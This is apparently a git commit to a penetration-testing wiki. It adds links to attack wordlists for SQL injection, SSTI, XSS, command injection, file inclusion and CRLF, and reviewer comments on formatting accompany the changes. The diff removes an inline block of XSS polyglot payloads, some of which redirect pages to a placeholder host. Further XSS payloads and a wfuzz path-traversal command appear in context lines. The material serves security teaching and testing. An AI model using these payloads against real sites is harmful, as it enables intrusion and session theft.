GitBook: [master] 10 pages modified

This commit is contained in:
CPol 2021-06-27 21:56:13 +00:00 committed by gitbook-bot
parent 87c5de72fa
commit aae0f909fe
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
10 changed files with 41 additions and 39 deletions

View File

@ -71,5 +71,7 @@ javascript:alert(1)%252f%252f..%252fcss-images
**More payloads in** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)\*\*\*\*
\*\*\*\*
## **Brute-Force Detection List**
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/ssti.txt" %}
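Review bot: the `\*\*\*\*` run at the end of the PortSwigger link line and the `\*\*\*\*` on the line after it are empty bold markers that render as stray asterisks; drop them rather than carry them into the new section. The added `## **Brute-Force Detection List**` heading is also bolded inside the `##`, while the other pages in this commit use plain `## Brute-Force Detection List`; the plain form keeps the headings consistent. This hunk embeds `ssti.txt`, the same list the template-injection page further down (the hunk ending in `## Practice`) embeds; if both pages are meant to share one list that is fine, but it is worth confirming the list covers both uses.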

View File

@ -120,6 +120,10 @@ powershell C:\*\*2\n??e*d.*? # notepad
{% page-ref page="../linux-unix/useful-linux-commands/bypass-bash-restrictions.md" %}
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/command\_injection.txt" %}
## References
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection" %}

View File

@ -179,6 +179,10 @@ The best prevention technique is to not use users input directly inside response
{% embed url="https://github.com/dwisiswant0/crlfuzz" %}
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt" %}
## References
* [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)\*\*\*\*
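Review bot: the reference bullet ends in `\*\*\*\*`, an empty bold pair left over from the editor, which will render as literal asterisks after the link; remove it while this section is being touched.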

View File

@ -225,6 +225,10 @@ At the moment of this writing you need to enable the portal tag on Chrome in `ch
Not all the ways to leak connectivity in HTML will be useful for Dangling Markup, but sometimes it could help. Check them here: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/dangling\_markup.txt" %}
## References
All the techniques presented here and more can view reviewed with more details in:
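Review bot: the context line `All the techniques presented here and more can view reviewed with more details in:` should read `can be reviewed`; since the new `## Brute-Force Detection List` block is inserted right above it, this is a cheap drive-by fix to fold into the same commit.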

View File

@ -29,24 +29,18 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
**Mixing several \*nix LFI lists and adding more paths I have created this one:**
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_linux.txt" %}
Try also to change `/` for `\`
Try also to add `../../../../../`
If you want to test several depths of folders with some bypasses included you can use the list [https://github.com/1N3/IntruderPayloads/blob/master/FuzzLists/traversal.txt](https://github.com/1N3/IntruderPayloads/blob/master/FuzzLists/traversal.txt)
**TODO**
A list that uses several techniques to find the file /etc/password \(to check if the vulnerability exists\) can be found [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)
### **Windows**
Using theses lists and deleting repetitions I have created a new one:
Merging several lists I have created:
* [https://raw.githubusercontent.com/soffensive/windowsblindread/master/windows-files.txt](https://raw.githubusercontent.com/soffensive/windowsblindread/master/windows-files.txt)
* [https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/](https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal)
* [https://github.com/soffensive/windowsblindread/blob/master/windows-files.txt](https://github.com/soffensive/windowsblindread/blob/master/windows-files.txt)
* [http://awesomehackers.org/2018/05/11/path-traversal-cheat-sheet/](http://awesomehackers.org/2018/05/11/path-traversal-cheat-sheet/)
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_windows.txt" %}
Try also to change `/` for `\`
Try also to remove `C:/` and add `../../../../../`
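Review bot: several leftovers remain in this region. The bare `**TODO**` marker is still in the published text; either finish the sentence it stands for or remove it. `/etc/password` should be `/etc/passwd`, which is the file the traversal check is actually looking for. The two lines `Using theses lists and deleting repetitions I have created a new one:` and `Merging several lists I have created:` read as old and new versions of the same sentence (the rendering does not show which is removed); whichever stays, `theses` should be `these`. Finally, the soffensive `windows-files.txt` list is cited twice, once via `raw.githubusercontent.com` and once via the `github.com/.../blob` URL; keep one.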

View File

@ -123,3 +123,7 @@ Check the XSLT page:
* [https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)
* [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/ssi\_esi.txt" %}
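Review bot: here the `## Brute-Force Detection List` section is appended after the references bullets, whereas the command injection, CRLF, dangling markup and XSLT hunks in this commit place it before `## References`; the SQL injection hunk below does the same as this one. Pick one placement (before `## References` matches the majority) so the section sits in the same spot on every page.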

View File

@ -476,3 +476,7 @@ WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())
* [https://sqlwiki.netspi.com/](https://sqlwiki.netspi.com/)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/sqli.txt" %}

View File

@ -798,7 +798,11 @@ If you think it could be useful, read:
## Tools
* [https://github.com/epinna/tplmap](https://github.com/epinna/tplmap)
{% embed url="https://github.com/epinna/tplmap" %}
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/ssti.txt" %}
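Review bot: tplmap now appears twice in `## Tools`, as the bullet `* [https://github.com/epinna/tplmap]` and as the `{% embed url="https://github.com/epinna/tplmap" %}` directly beneath it; keep one form (the embed, if the rest of the section uses embeds) so the tool is not listed twice.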
## Practice

View File

@ -397,6 +397,10 @@ version="1.0">
\(Example from [http://laurent.bientz.com/Blog/Entry/Item/using\_php\_functions\_in\_xsl-7.sls](http://laurent.bientz.com/Blog/Entry/Item/using_php_functions_in_xsl-7.sls)\)
## **Brute-Force Detection List**
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/xslt.txt" %}
## **References**
* [XSLT\_SSRF](https://feelsec.info/wp-content/uploads/2018/11/XSLT_SSRF.pdf)
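Review bot: `## **Brute-Force Detection List**` and `## **References**` wrap the heading text in bold, the same inconsistency as in the first hunk; the other pages use plain `## Brute-Force Detection List` and `## References`, and the plain form should be used here too.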

View File

@ -818,33 +818,7 @@ There is **C2** dedicated to the **exploitation of Service Workers** called [**S
### Polyglots
```javascript
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=document.location=`//localhost/mH`//>
```
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/xss\_polyglots.txt" %}
### Blind XSS payloads
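Review bot: the hunk header (`-818,33 +818,7`) shows the whole inline polyglot code block being replaced by a single `{% embed %}` of `xss_polyglots.txt`, so `### Polyglots` is now a heading with nothing but an external link under it, and the content depends on a file on the `main` branch of another repository. Consider keeping one or two representative entries inline under the heading, with a sentence saying the full list lives in the embedded file, so the section still reads on its own and survives changes to the external list.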
@ -888,6 +862,10 @@ javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
```
### Brute-Force List
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/xss.txt" %}
## XSS Abusing other vulnerabilities
### XSS to SSRF
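Review bot: this hunk adds the section as `### Brute-Force List`, a level-3 heading with a different name, while every other page in this commit uses `## Brute-Force Detection List`; rename it to `## Brute-Force Detection List` so the section is findable under the same title across pages (it also fits better beside the sibling `## XSS Abusing other vulnerabilities` heading that follows).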